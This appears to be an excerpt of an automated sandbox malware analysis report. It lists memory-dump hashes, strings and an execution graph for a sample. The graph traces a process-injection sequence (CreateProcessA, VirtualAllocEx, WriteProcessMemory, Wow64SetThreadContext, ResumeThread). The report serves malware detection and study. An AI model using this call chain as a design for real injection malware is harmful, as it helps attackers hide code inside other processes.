                                              • Instruction Fuzzy Hash: 26C0123320C1282BA625108E7C40AA3BB8CD2C12F4A250137F91CA3220A8529C8101A8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d9834cc32985719014ac9820b37f953e8f1563f5e89663bbb236316644e915f
                                              • Instruction ID: c02322b736982cbb5fd51d4707319b3b8937a03f337288efce33d36e4f1f5afb
                                              • Opcode Fuzzy Hash: 5d9834cc32985719014ac9820b37f953e8f1563f5e89663bbb236316644e915f
                                              • Instruction Fuzzy Hash: EBD0173AB000089FCB048F88E8408DDB7B6FB8C221B108016E911A3260C6319821CB90
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ba159081da90cff6d1ea08b6699291c8d1b7d4bf28b8339db7f52259f24ed6b7
                                              • Instruction ID: bdec675c0e50cf42756717f67e132fe177344cc60ed76c5abe0e98c6eff50654
                                              • Opcode Fuzzy Hash: ba159081da90cff6d1ea08b6699291c8d1b7d4bf28b8339db7f52259f24ed6b7
                                              • Instruction Fuzzy Hash: 3FD02B349083479BC736F774E8640993B71BAD110CB104596D8014D86BEB750C4A4F72
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de78b3fa81cb9cef2ef9dd3bcdd40ebf8a4d01220ceaadf2e8a424736837d4e5
                                              • Instruction ID: a6ae73e6b73e49ec3310503d3efe89b54022aa98e2962935b4545c26ba824fb0
                                              • Opcode Fuzzy Hash: de78b3fa81cb9cef2ef9dd3bcdd40ebf8a4d01220ceaadf2e8a424736837d4e5
                                              • Instruction Fuzzy Hash: 9FD04878904128DFDB209F64EA492E8B7B0EB99309F0014A7D909B2220D6705A568F22
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e81cb3fe99c5305ed2b79c2f319a3febe341f48b20d43f20e4d25b10fba2c412
                                              • Instruction ID: fe6c849c517902cbd2403049f3dfbeb8fba02a384e50a8966f494ba86ae82524
                                              • Opcode Fuzzy Hash: e81cb3fe99c5305ed2b79c2f319a3febe341f48b20d43f20e4d25b10fba2c412
                                              • Instruction Fuzzy Hash: E7C0123450430F87D525F7B1F954555336A76D0518F404510E1090A56EDF745C494BB2
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 33a25e14831ccc50a00763a4aa6ad4ecaa5e0924bb45823c87ff9b279a1642c2
                                              • Instruction ID: f1cc6e0479799d3edcfe7557f1e6c162b0ed2c7e2b10803e15080003738594b6
                                              • Opcode Fuzzy Hash: 33a25e14831ccc50a00763a4aa6ad4ecaa5e0924bb45823c87ff9b279a1642c2
                                              • Instruction Fuzzy Hash: 61C04C78100641C9ED6897A059D951D36B0ABC4715F6A9472C811551948A349045DB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "$0oEp$LjEp$LjEp$LjEp$LjEp$LjEp$LjEp$LjEp$LjEp$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                              • API String ID: 0-3075396612
                                              • Opcode ID: 031450b5766a17170bc449dc14f9aac9950b440f8b07524afc1d4374ccd7e09d
                                              • Instruction ID: 573be0cfc595defc2bcc4ff1881d7b054c6aaa329a30dcf332793a6cefc9e8bf
                                              • Opcode Fuzzy Hash: 031450b5766a17170bc449dc14f9aac9950b440f8b07524afc1d4374ccd7e09d
                                              • Instruction Fuzzy Hash: C53280B4E002188FEB68DF65D954BEDBBB2BF89300F1090A9D809AB355DB755E85CF10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "$0oEp$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                              • API String ID: 0-659101215
                                              • Opcode ID: d0b7be2f3d5f7fd40b9a6b2ef7ad93f6ccc6aba4575bb6ccb36b6eff482df9f8
                                              • Instruction ID: 6c8034af1851822dc70b669daa1b2c54f52cacd597a41a8458356a63b6eeb5dc
                                              • Opcode Fuzzy Hash: d0b7be2f3d5f7fd40b9a6b2ef7ad93f6ccc6aba4575bb6ccb36b6eff482df9f8
                                              • Instruction Fuzzy Hash: 4302A1B4E002188FDB68DF65D994BEDBBB2BF89300F1080A9D809AB355DB755E85CF10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Xq$Xq$Xq$Xq
                                              • API String ID: 0-3965792415
                                              • Opcode ID: 123073a81b42fdbe95531ad6202b0acd0404967b04c2c1a90c3a3a79dd795ec8
                                              • Instruction ID: 4ac1ae011b3466e1aa5db73bc7df2b458dd467422281c43ef5f5b691ae87d2e9
                                              • Opcode Fuzzy Hash: 123073a81b42fdbe95531ad6202b0acd0404967b04c2c1a90c3a3a79dd795ec8
                                              • Instruction Fuzzy Hash: 0BD1EFA8E0330523C5705D759C82EEB356EDBC86F1B109B54B6376B3E2EC64C88256F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Xq$Xq$Xq$Xq
                                              • API String ID: 0-3965792415
                                              • Opcode ID: 73e072812b912af7ae9a525a1a6c0e5800b732da9f1931a4a35159018101fab9
                                              • Instruction ID: 792be5594541d6c2f45fa6b82428a093e0520579dc9b94412703658fe5bbfa91
                                              • Opcode Fuzzy Hash: 73e072812b912af7ae9a525a1a6c0e5800b732da9f1931a4a35159018101fab9
                                              • Instruction Fuzzy Hash: 173185B1E0022B4BEF748A6488517FFB7A5AFC4340F1475F98919A7640EAB8CD41DB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \;q$\;q$\;q$\;q
                                              • API String ID: 0-2933265366
                                              • Opcode ID: ad1814191f24359dd8785ba8a718922e386543c8b71b1d59924241f17c5c6eeb
                                              • Instruction ID: 26784e7a151d8aeab26a7559f35b6fda2aeabf6738be522103b8aadce4f64c6b
                                              • Opcode Fuzzy Hash: ad1814191f24359dd8785ba8a718922e386543c8b71b1d59924241f17c5c6eeb
                                              • Instruction Fuzzy Hash: 5901A7717001258FEB25CA2DC444A2777F6BFCA6A471A827BE602CB3B5DA71DC428750

                                              Execution Graph

                                              Execution Coverage:10.2%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:298
                                              Total number of Limit Nodes:14
                                              execution_graph 35321 4f88948 35322 4f88975 35321->35322 35325 4f88400 35322->35325 35324 4f88a5d 35326 4f8840b 35325->35326 35331 4f8a2a0 35326->35331 35330 4f8a54d 35330->35324 35332 4f8a2ab 35331->35332 35339 4f8d97c 35332->35339 35334 4f8a52c 35335 4f8a2b0 35334->35335 35336 4f8a2bb 35335->35336 35337 4f8d97c 2 API calls 35336->35337 35338 4f8fdb5 35337->35338 35338->35330 35340 4f8d987 35339->35340 35344 d45ccc 35340->35344 35348 d4830b 35340->35348 35341 4f8f576 35341->35334 35346 d45cd7 35344->35346 35345 d48609 35345->35341 35346->35345 35352 d4cd77 35346->35352 35350 d48318 35348->35350 35349 d48609 35349->35341 35350->35349 35351 d4cd77 2 API calls 35350->35351 35351->35349 35353 d4cd99 35352->35353 35354 d4cdbd 35353->35354 35357 d4cf18 35353->35357 35361 d4cf28 35353->35361 35354->35345 35359 d4cf35 35357->35359 35358 d4cf6f 35358->35354 35359->35358 35365 d4bae0 35359->35365 35362 d4cf35 35361->35362 35363 d4bae0 2 API calls 35362->35363 35364 d4cf6f 35362->35364 35363->35364 35364->35354 35366 d4baeb 35365->35366 35368 d4dc88 35366->35368 35369 d4d2dc 35366->35369 35368->35368 35370 d4d2e7 35369->35370 35371 d45ccc 2 API calls 35370->35371 35372 d4dcf7 35371->35372 35376 d4fa88 35372->35376 35382 d4fa70 35372->35382 35373 d4dd31 35373->35368 35378 d4fab9 35376->35378 35379 d4fbb9 35376->35379 35377 d4fac5 35377->35373 35378->35377 35388 4f809c0 35378->35388 35392 4f809b3 35378->35392 35379->35373 35384 d4fbb9 35382->35384 35385 d4fab9 35382->35385 35383 d4fac5 35383->35373 35384->35373 35385->35383 35386 4f809c0 2 API calls 35385->35386 35387 4f809b3 2 API calls 35385->35387 35386->35384 35387->35384 35389 4f809eb 35388->35389 35390 4f80a9a 35389->35390 35391 4f81790 CreateWindowExW CreateWindowExW 35389->35391 35391->35390 35393 4f809eb 35392->35393 35394 4f80a9a 35393->35394 35395 4f81790 CreateWindowExW CreateWindowExW 35393->35395 35395->35394 35223 8729330 35224 87294bb 35223->35224 35226 8729356 35223->35226 35226->35224 35227 87258e4 35226->35227 35228 87295b0 PostMessageW 35227->35228 35229 872961c 35228->35229 35229->35226 35232 cfd01c 35233 cfd034 35232->35233 35234 cfd08e 35233->35234 35239 4f81aa8 35233->35239 35244 4f82808 35233->35244 35250 4f82818 35233->35250 35255 4f81a98 35233->35255 35240 4f81ace 35239->35240 35242 4f82818 2 API calls 35240->35242 35243 4f82808 2 API calls 35240->35243 35241 4f81aef 35241->35234 35242->35241 35243->35241 35245 4f827b3 35244->35245 35246 4f82816 35244->35246 35245->35234 35247 4f82877 35246->35247 35260 4f829a0 35246->35260 35265 4f82991 35246->35265 35251 4f82845 35250->35251 35252 4f82877 35251->35252 35253 4f829a0 2 API calls 35251->35253 35254 4f82991 2 API calls 35251->35254 35253->35252 35254->35252 35256 4f81ace 35255->35256 35258 4f82818 2 API calls 35256->35258 35259 4f82808 2 API calls 35256->35259 35257 4f81aef 35257->35234 35258->35257 35259->35257 35262 4f829b4 35260->35262 35261 4f82a40 35261->35247 35270 4f82a48 35262->35270 35273 4f82a58 35262->35273 35267 4f829b4 35265->35267 35266 4f82a40 35266->35247 35268 4f82a58 2 API calls 35267->35268 35269 4f82a48 2 API calls 35267->35269 35268->35266 35269->35266 35271 4f82a69 35270->35271 35276 4f8401f 35270->35276 35271->35261 35274 4f82a69 35273->35274 35275 4f8401f 2 API calls 35273->35275 35274->35261 35275->35274 35280 4f84040 35276->35280 35284 4f84030 35276->35284 35277 4f8402a 35277->35271 35281 4f84082 35280->35281 35283 4f84089 35280->35283 35282 4f840da CallWindowProcW 35281->35282 35281->35283 35282->35283 35283->35277 35285 4f84082 35284->35285 35287 4f84089 35284->35287 35286 4f840da CallWindowProcW 35285->35286 35285->35287 35286->35287 35287->35277 35230 d4d690 DuplicateHandle 35231 d4d726 35230->35231 35288 d4d040 35289 d4d086 GetCurrentProcess 35288->35289 35291 d4d0d8 GetCurrentThread 35289->35291 35293 d4d0d1 35289->35293 35292 d4d115 GetCurrentProcess 35291->35292 35294 d4d10e 35291->35294 35295 d4d14b 35292->35295 35293->35291 35294->35292 35296 d4d173 GetCurrentThreadId 35295->35296 35297 d4d1a4 35296->35297 35298 d4acb0 35301 d4ada8 35298->35301 35299 d4acbf 35302 d4adb9 35301->35302 35303 d4addc 35301->35303 35302->35303 35309 d4b040 35302->35309 35313 d4b031 35302->35313 35303->35299 35304 d4afe0 GetModuleHandleW 35306 d4b00d 35304->35306 35305 d4add4 35305->35303 35305->35304 35306->35299 35310 d4b054 35309->35310 35311 d4b079 35310->35311 35317 d4a130 35310->35317 35311->35305 35315 d4b054 35313->35315 35314 d4b079 35314->35305 35315->35314 35316 d4a130 LoadLibraryExW 35315->35316 35316->35314 35318 d4b220 LoadLibraryExW 35317->35318 35320 d4b299 35318->35320 35320->35311 35396 8725007 35397 8724fb7 35396->35397 35398 8724f8f 35396->35398 35402 8728228 35397->35402 35418 87281a9 35397->35418 35435 8728218 35397->35435 35403 8728242 35402->35403 35416 8728266 35403->35416 35451 8728772 35403->35451 35457 872896c 35403->35457 35463 87288ce 35403->35463 35467 8728b68 35403->35467 35473 8728508 35403->35473 35479 8728ca8 35403->35479 35483 8728921 35403->35483 35488 87289a0 35403->35488 35493 8728782 35403->35493 35497 8728bdc 35403->35497 35502 8728618 35403->35502 35508 8728518 35403->35508 35514 87290b5 35403->35514 35416->35398 35419 87281c5 35418->35419 35420 8728219 35418->35420 35419->35398 35421 8728772 2 API calls 35420->35421 35422 87290b5 2 API calls 35420->35422 35423 8728518 2 API calls 35420->35423 35424 8728618 2 API calls 35420->35424 35425 8728bdc 2 API calls 35420->35425 35426 8728782 2 API calls 35420->35426 35427 87289a0 2 API calls 35420->35427 35428 8728921 2 API calls 35420->35428 35429 8728ca8 2 API calls 35420->35429 35430 8728508 2 API calls 35420->35430 35431 8728b68 2 API calls 35420->35431 35432 87288ce 2 API calls 35420->35432 35433 8728266 35420->35433 35434 872896c 4 API calls 35420->35434 35421->35433 35422->35433 35423->35433 35424->35433 35425->35433 35426->35433 35427->35433 35428->35433 35429->35433 35430->35433 35431->35433 35432->35433 35433->35398 35434->35433 35436 8728242 35435->35436 35437 8728772 2 API calls 35436->35437 35438 87290b5 2 API calls 35436->35438 35439 8728518 2 API calls 35436->35439 35440 8728618 2 API calls 35436->35440 35441 8728266 35436->35441 35442 8728bdc 2 API calls 35436->35442 35443 8728782 2 API calls 35436->35443 35444 87289a0 2 API calls 35436->35444 35445 8728921 2 API calls 35436->35445 35446 8728ca8 2 API calls 35436->35446 35447 8728508 2 API calls 35436->35447 35448 8728b68 2 API calls 35436->35448 35449 87288ce 2 API calls 35436->35449 35450 872896c 4 API calls 35436->35450 35437->35441 35438->35441 35439->35441 35440->35441 35441->35398 35442->35441 35443->35441 35444->35441 35445->35441 35446->35441 35447->35441 35448->35441 35449->35441 35450->35441 35452 872877b 35451->35452 35453 872875a 35451->35453 35518 8724898 35452->35518 35522 87248a0 35452->35522 35453->35416 35454 8728d6d 35526 87247e0 35457->35526 35530 87247d8 35457->35530 35458 872898a 35461 87248a0 WriteProcessMemory 35458->35461 35462 8724898 WriteProcessMemory 35458->35462 35461->35458 35462->35458 35534 8724990 35463->35534 35538 8724989 35463->35538 35464 8728902 35464->35416 35468 8728938 35467->35468 35469 87290a8 35468->35469 35542 8724218 35468->35542 35546 8724220 35468->35546 35469->35416 35470 872894d 35475 8728518 35473->35475 35474 8728636 35474->35416 35475->35474 35550 8724b28 35475->35550 35554 8724b1d 35475->35554 35558 8724700 35479->35558 35562 8724708 35479->35562 35480 8728cc2 35484 8728927 35483->35484 35486 8724220 ResumeThread 35484->35486 35487 8724218 ResumeThread 35484->35487 35485 872894d 35486->35485 35487->35485 35489 8728daa 35488->35489 35491 8724700 Wow64SetThreadContext 35489->35491 35492 8724708 Wow64SetThreadContext 35489->35492 35490 8728dc5 35490->35416 35491->35490 35492->35490 35495 87248a0 WriteProcessMemory 35493->35495 35496 8724898 WriteProcessMemory 35493->35496 35494 87287b0 35494->35416 35495->35494 35496->35494 35498 8728d49 35497->35498 35500 87248a0 WriteProcessMemory 35498->35500 35501 8724898 WriteProcessMemory 35498->35501 35499 8728d6d 35500->35499 35501->35499 35503 8728636 35502->35503 35504 8728621 35502->35504 35503->35416 35504->35503 35506 8724b28 CreateProcessA 35504->35506 35507 8724b1d CreateProcessA 35504->35507 35505 872872f 35505->35416 35506->35505 35507->35505 35510 872854b 35508->35510 35509 8728636 35509->35416 35510->35509 35512 8724b28 CreateProcessA 35510->35512 35513 8724b1d CreateProcessA 35510->35513 35511 872872f 35511->35416 35512->35511 35513->35511 35515 8729044 35514->35515 35516 87248a0 WriteProcessMemory 35515->35516 35517 8724898 WriteProcessMemory 35515->35517 35516->35515 35517->35515 35519 87248e8 WriteProcessMemory 35518->35519 35521 872493f 35519->35521 35521->35454 35523 87248e8 WriteProcessMemory 35522->35523 35525 872493f 35523->35525 35525->35454 35527 8724820 VirtualAllocEx 35526->35527 35529 872485d 35527->35529 35529->35458 35531 8724820 VirtualAllocEx 35530->35531 35533 872485d 35531->35533 35533->35458 35535 87249db ReadProcessMemory 35534->35535 35537 8724a1f 35535->35537 35537->35464 35539 87249db ReadProcessMemory 35538->35539 35541 8724a1f 35539->35541 35541->35464 35543 8724260 ResumeThread 35542->35543 35545 8724291 35543->35545 35545->35470 35547 8724260 ResumeThread 35546->35547 35549 8724291 35547->35549 35549->35470 35551 8724bb1 CreateProcessA 35550->35551 35553 8724d73 35551->35553 35553->35553 35555 8724bb1 35554->35555 35555->35555 35556 8724d16 CreateProcessA 35555->35556 35557 8724d73 35556->35557 35557->35557 35559 872474d Wow64SetThreadContext 35558->35559 35561 8724795 35559->35561 35561->35480 35563 872474d Wow64SetThreadContext 35562->35563 35565 8724795 35563->35565 35565->35480 35566 d44668 35567 d4467a 35566->35567 35568 d44686 35567->35568 35572 d44779 35567->35572 35577 d43e40 35568->35577 35570 d446a5 35573 d4479d 35572->35573 35581 d44888 35573->35581 35585 d44879 35573->35585 35578 d43e4b 35577->35578 35593 d45c4c 35578->35593 35580 d47048 35580->35570 35583 d448af 35581->35583 35582 d4498c 35582->35582 35583->35582 35589 d444c4 35583->35589 35586 d448af 35585->35586 35587 d4498c 35586->35587 35588 d444c4 CreateActCtxA 35586->35588 35587->35587 35588->35587 35590 d45918 CreateActCtxA 35589->35590 35592 d459db 35590->35592 35592->35592 35594 d45c57 35593->35594 35597 d45c6c 35594->35597 35596 d470ed 35596->35580 35598 d45c77 35597->35598 35601 d45c9c 35598->35601 35600 d471c2 35600->35596 35602 d45ca7 35601->35602 35603 d45ccc 2 API calls 35602->35603 35604 d472c5 35603->35604 35604->35600

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 294 d4d031-d4d0cf GetCurrentProcess 298 d4d0d1-d4d0d7 294->298 299 d4d0d8-d4d10c GetCurrentThread 294->299 298->299 300 d4d115-d4d149 GetCurrentProcess 299->300 301 d4d10e-d4d114 299->301 302 d4d152-d4d16d call d4d618 300->302 303 d4d14b-d4d151 300->303 301->300 307 d4d173-d4d1a2 GetCurrentThreadId 302->307 303->302 308 d4d1a4-d4d1aa 307->308 309 d4d1ab-d4d20d 307->309 308->309
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 00D4D0BE
                                              • GetCurrentThread.KERNEL32 ref: 00D4D0FB
                                              • GetCurrentProcess.KERNEL32 ref: 00D4D138
                                              • GetCurrentThreadId.KERNEL32 ref: 00D4D191
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: dcb3dd5dad679d9642dba2df45e548d99ccca2ca0e8624d493b6ea758ff8a439
                                              • Instruction ID: 46afa479453f207bce9de45cb8da87789ac84691caf48c026775fe1663cea666
                                              • Opcode Fuzzy Hash: dcb3dd5dad679d9642dba2df45e548d99ccca2ca0e8624d493b6ea758ff8a439
                                              • Instruction Fuzzy Hash: CC5165B0D003498FEB14DFAAD548BAEBBF1BF88304F248459E409A7390D7746945CB25

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 316 d4d040-d4d0cf GetCurrentProcess 320 d4d0d1-d4d0d7 316->320 321 d4d0d8-d4d10c GetCurrentThread 316->321 320->321 322 d4d115-d4d149 GetCurrentProcess 321->322 323 d4d10e-d4d114 321->323 324 d4d152-d4d16d call d4d618 322->324 325 d4d14b-d4d151 322->325 323->322 329 d4d173-d4d1a2 GetCurrentThreadId 324->329 325->324 330 d4d1a4-d4d1aa 329->330 331 d4d1ab-d4d20d 329->331 330->331
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 00D4D0BE
                                              • GetCurrentThread.KERNEL32 ref: 00D4D0FB
                                              • GetCurrentProcess.KERNEL32 ref: 00D4D138
                                              • GetCurrentThreadId.KERNEL32 ref: 00D4D191
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 072fd211dc53045bd15eb02359f1d654f9ac0e41bd564e33a8ea644e4baf0383
                                              • Instruction ID: d2d228b2a388492d2e14fe35a15cd61986496d4bc28dc6853dadb3159b68a0be
                                              • Opcode Fuzzy Hash: 072fd211dc53045bd15eb02359f1d654f9ac0e41bd564e33a8ea644e4baf0383
                                              • Instruction Fuzzy Hash: 6F5154B0D003498FEB14DFAAD548BAEBBF1BF88304F248459E409A7350D7746985CF65

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1212 8724b1d-8724bbd 1214 8724bf6-8724c16 1212->1214 1215 8724bbf-8724bc9 1212->1215 1222 8724c18-8724c22 1214->1222 1223 8724c4f-8724c7e 1214->1223 1215->1214 1216 8724bcb-8724bcd 1215->1216 1217 8724bf0-8724bf3 1216->1217 1218 8724bcf-8724bd9 1216->1218 1217->1214 1220 8724bdb 1218->1220 1221 8724bdd-8724bec 1218->1221 1220->1221 1221->1221 1225 8724bee 1221->1225 1222->1223 1224 8724c24-8724c26 1222->1224 1231 8724c80-8724c8a 1223->1231 1232 8724cb7-8724d71 CreateProcessA 1223->1232 1226 8724c28-8724c32 1224->1226 1227 8724c49-8724c4c 1224->1227 1225->1217 1229 8724c36-8724c45 1226->1229 1230 8724c34 1226->1230 1227->1223 1229->1229 1233 8724c47 1229->1233 1230->1229 1231->1232 1234 8724c8c-8724c8e 1231->1234 1243 8724d73-8724d79 1232->1243 1244 8724d7a-8724e00 1232->1244 1233->1227 1236 8724c90-8724c9a 1234->1236 1237 8724cb1-8724cb4 1234->1237 1238 8724c9e-8724cad 1236->1238 1239 8724c9c 1236->1239 1237->1232 1238->1238 1241 8724caf 1238->1241 1239->1238 1241->1237 1243->1244 1254 8724e02-8724e06 1244->1254 1255 8724e10-8724e14 1244->1255 1254->1255 1256 8724e08 1254->1256 1257 8724e16-8724e1a 1255->1257 1258 8724e24-8724e28 1255->1258 1256->1255 1257->1258 1261 8724e1c 1257->1261 1259 8724e2a-8724e2e 1258->1259 1260 8724e38-8724e3c 1258->1260 1259->1260 1262 8724e30 1259->1262 1263 8724e4e-8724e55 1260->1263 1264 8724e3e-8724e44 1260->1264 1261->1258 1262->1260 1265 8724e57-8724e66 1263->1265 1266 8724e6c 1263->1266 1264->1263 1265->1266 1268 8724e6d 1266->1268 1268->1268
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08724D5E
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 1efbe52a80d5efe7ad4d0c80c13b8ed25122ad59a7a39ec5f9f4848b88cb2780
                                              • Instruction ID: e682b6dc78f92be9510bbfc4b1576fc55403cc836504f06d5b1f8ab18503d648
                                              • Opcode Fuzzy Hash: 1efbe52a80d5efe7ad4d0c80c13b8ed25122ad59a7a39ec5f9f4848b88cb2780
                                              • Instruction Fuzzy Hash: 44A15C71D01329CFEB24DF68C8417EDBBF2BB48305F0481A9E808A7244DB749985CFA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1269 8724b28-8724bbd 1271 8724bf6-8724c16 1269->1271 1272 8724bbf-8724bc9 1269->1272 1279 8724c18-8724c22 1271->1279 1280 8724c4f-8724c7e 1271->1280 1272->1271 1273 8724bcb-8724bcd 1272->1273 1274 8724bf0-8724bf3 1273->1274 1275 8724bcf-8724bd9 1273->1275 1274->1271 1277 8724bdb 1275->1277 1278 8724bdd-8724bec 1275->1278 1277->1278 1278->1278 1282 8724bee 1278->1282 1279->1280 1281 8724c24-8724c26 1279->1281 1288 8724c80-8724c8a 1280->1288 1289 8724cb7-8724d71 CreateProcessA 1280->1289 1283 8724c28-8724c32 1281->1283 1284 8724c49-8724c4c 1281->1284 1282->1274 1286 8724c36-8724c45 1283->1286 1287 8724c34 1283->1287 1284->1280 1286->1286 1290 8724c47 1286->1290 1287->1286 1288->1289 1291 8724c8c-8724c8e 1288->1291 1300 8724d73-8724d79 1289->1300 1301 8724d7a-8724e00 1289->1301 1290->1284 1293 8724c90-8724c9a 1291->1293 1294 8724cb1-8724cb4 1291->1294 1295 8724c9e-8724cad 1293->1295 1296 8724c9c 1293->1296 1294->1289 1295->1295 1298 8724caf 1295->1298 1296->1295 1298->1294 1300->1301 1311 8724e02-8724e06 1301->1311 1312 8724e10-8724e14 1301->1312 1311->1312 1313 8724e08 1311->1313 1314 8724e16-8724e1a 1312->1314 1315 8724e24-8724e28 1312->1315 1313->1312 1314->1315 1318 8724e1c 1314->1318 1316 8724e2a-8724e2e 1315->1316 1317 8724e38-8724e3c 1315->1317 1316->1317 1319 8724e30 1316->1319 1320 8724e4e-8724e55 1317->1320 1321 8724e3e-8724e44 1317->1321 1318->1315 1319->1317 1322 8724e57-8724e66 1320->1322 1323 8724e6c 1320->1323 1321->1320 1322->1323 1325 8724e6d 1323->1325 1325->1325
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08724D5E
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 18a0694d3caac70cd89483561f63cf7a682fb95f20dc20185159e0b7dae22f8a
                                              • Instruction ID: c36d6754c7770fd9e0e9aa9b138f12d2241b6e172a78c7ffd58e14a1c2b4ccdb
                                              • Opcode Fuzzy Hash: 18a0694d3caac70cd89483561f63cf7a682fb95f20dc20185159e0b7dae22f8a
                                              • Instruction Fuzzy Hash: 55915971D00369CFEB24DF68C841BEDBBF2BB48305F0481A9E808A7244DB749985CFA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
